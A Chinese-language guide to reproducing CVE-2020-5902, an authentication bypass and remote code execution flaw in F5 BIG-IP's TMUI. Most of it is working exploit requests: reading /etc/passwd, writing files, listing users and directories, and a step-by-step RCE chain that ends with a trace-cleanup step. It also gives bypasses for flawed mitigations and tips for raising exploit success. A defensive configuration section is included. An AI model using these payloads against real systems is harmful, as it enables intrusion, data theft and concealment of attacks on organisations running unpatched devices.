F5 BIG-IP TMUI RCE漏洞（CVE-2020-5902）技术分析与复现指南<\/h1>

0x00 漏洞概述<\/h2>
F5 BIG-IP的TMUI组件（流量管理用户界面）存在认证绕过漏洞，该漏洞源于Tomcat解析的URL与`request.getPathInfo()<\/code>存在差异，导致攻击者可以绕过权限验证，未授权访问TMUI模块所有功能，进而实现文件读写、命令执行等高危操作。<\/p>`

0x01 影响版本范围<\/h2>

BIG-IP 15.x: 15.1.0\/15.0.0<\/li>
BIG-IP 14.x: 14.1.0 ~ 14.1.2<\/li>
BIG-IP 13.x: 13.1.0 ~ 13.1.3<\/li>
BIG-IP 12.x: 12.1.0 ~ 12.1.5<\/li>
BIG-IP 11.x: 11.6.1 ~ 11.6.5<\/li>
<\/ul>
0x02 漏洞复现方法<\/h2>
环境信息<\/h3>

TMUI网站目录：\/usr\/local\/www\/tmui\/<\/code><\/li>
TMUI web server：Tomcat<\/li>
<\/ul>
1. 漏洞检测POC<\/h3>
https:\/\/[target]\/tmui\/login.jsp\/..;\/tmui\/util\/getTabSet.jsp?tabId=test5902
https:\/\/[target]\/tmui\/login.jsp\/..;\/tmui\/system\/user\/authproperties.jsp
<\/code><\/pre>
2. 漏洞利用方式<\/h3>
任意文件读取<\/h4>
https:\/\/[target]\/tmui\/login.jsp\/..;\/tmui\/locallb\/workspace\/fileRead.jsp?fileName=\/etc\/passwd
<\/code><\/pre>
任意文件写入<\/h4>
https:\/\/[target]\/tmui\/login.jsp\/..;\/tmui\/locallb\/workspace\/fileSave.jsp
<\/code><\/pre>
列认证用户<\/h4>
https:\/\/[target]\/tmui\/login.jsp\/..;\/tmui\/locallb\/workspace\/tmshCmd.jsp?command=list+auth+user
<\/code><\/pre>
列目录<\/h4>
https:\/\/[target]\/tmui\/login.jsp\/..;\/tmui\/locallb\/workspace\/directoryList.jsp?directoryPath=\/usr\/local\/www\/
<\/code><\/pre>
远程命令执行(RCE)<\/h4>

创建命令别名：<\/li>
<\/ol>
https:\/\/[target]\/tmui\/login.jsp\/..;\/tmui\/locallb\/workspace\/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
<\/code><\/pre>

写入命令文件：<\/li>
<\/ol>
https:\/\/[target]\/tmui\/login.jsp\/..;\/tmui\/locallb\/workspace\/fileSave.jsp?fileName=\/tmp\/cmd&content=id
<\/code><\/pre>

执行命令：<\/li>
<\/ol>
https:\/\/[target]\/tmui\/login.jsp\/..;\/tmui\/locallb\/workspace\/tmshCmd.jsp?command=list+\/tmp\/cmd
<\/code><\/pre>

清理痕迹：<\/li>
<\/ol>
https:\/\/[target]\/tmui\/login.jsp\/..;\/tmui\/locallb\/workspace\/tmshCmd.jsp?command=delete+cli+alias+private+list
<\/code><\/pre>
0x03 有缺陷的缓解方案及绕过<\/h2>
有缺陷的缓解方案1<\/h3>
在httpd配置中添加：<\/p>
<LocationMatch<\/span> ".*\.\.;.*"<\/span>><\/span>
<\/span><\/span>  Redirect 404 \/
<\/span><\/span><\/LocationMatch><\/span>
<\/span><\/span><\/code><\/pre>绕过方法<\/strong>：使用\/hsqldb<\/code>接口加上分号(;)可以绕过认证，进而通过反序列化实现RCE<\/p>
有缺陷的缓解方案2<\/h3>
在httpd配置中添加：<\/p>
<LocationMatch<\/span> ";"<\/span>><\/span>
<\/span><\/span>  Redirect 404 \/
<\/span><\/span><\/LocationMatch><\/span>
<\/span><\/span><\/code><\/pre>绕过方法<\/strong>：使用\/hsqldb%0a<\/code>可以绕过认证<\/p>
0x04 完整防御方案<\/h2>

登录TMOS Shell(tmsh)：<\/li>
<\/ol>
tmsh
<\/code><\/pre>

编辑httpd组件配置文件：<\/li>
<\/ol>
edit \/sys httpd all-properties
<\/code><\/pre>

添加以下配置：<\/li>
<\/ol>
include '
<\/span><\/span><LocationMatch<\/span> ";"<\/span>><\/span>
<\/span><\/span>  Redirect 404 \/
<\/span><\/span><\/LocationMatch><\/span>
<\/span><\/span>
<\/span><\/span><LocationMatch<\/span> "hsqldb"<\/span>><\/span>
<\/span><\/span>  Redirect 404 \/
<\/span><\/span><\/LocationMatch><\/span>
<\/span><\/span>'
<\/span><\/span><\/code><\/pre>
保存并重启服务：<\/li>
<\/ol>
ESC
:wq!
save \/sys config
restart sys service httpd
quit
<\/code><\/pre>
最佳实践<\/strong>：将BIG-IP更新到最新版本<\/p>
0x05 复现注意事项<\/h2>

如果list auth user<\/code>或list \/tmp\/cmd.txt<\/code>返回空，多重复几次或使用intruder工具可能就有返回<\/li>
即使返回空，也可能已经实现RCE<\/li>
POST请求的成功率通常高于GET请求<\/li>
近期有管理员登录过的系统更容易获得返回值<\/li>
list auth user<\/code>能稳定返回值，RCE成功率高<\/li>
写webshell返回500可能缺少ecj-4.4.jar<\/code><\/li>
操作完成后记得还原list<\/code>命令，删除或覆盖命令文件<\/li>
遇到返回500或error错误，多重复几次可能就正常<\/li>
<\/ol>
0x06 检测工具<\/h2>
推荐使用开源检测工具：<\/p>

项目地址：https:\/\/github.com\/theLSA\/f5-bigip-rce-cve-2020-5902<\/li>
功能：支持单IP检测、批量IP检测、文件读写、列认证用户、列目录、远程命令执行和hsqldb认证绕过检测<\/li>
<\/ul>
0x07 参考资料<\/h2>

F5官方公告：https:\/\/support.f5.com\/csp\/article\/K52145254<\/li>
漏洞利用代码：https:\/\/github.com\/jas502n\/CVE-2020-5902<\/li>
技术分析文章：https:\/\/www.anquanke.com\/post\/id\/209932<\/li>
反序列化利用工具：https:\/\/github.com\/Critical-Start\/Team-Ares\/tree\/master\/CVE-2020-5902<\/li>
漏洞分析报告：https:\/\/www.criticalstart.com\/f5-big-ip-remote-code-execution-exploit\/<\/li>
<\/ol>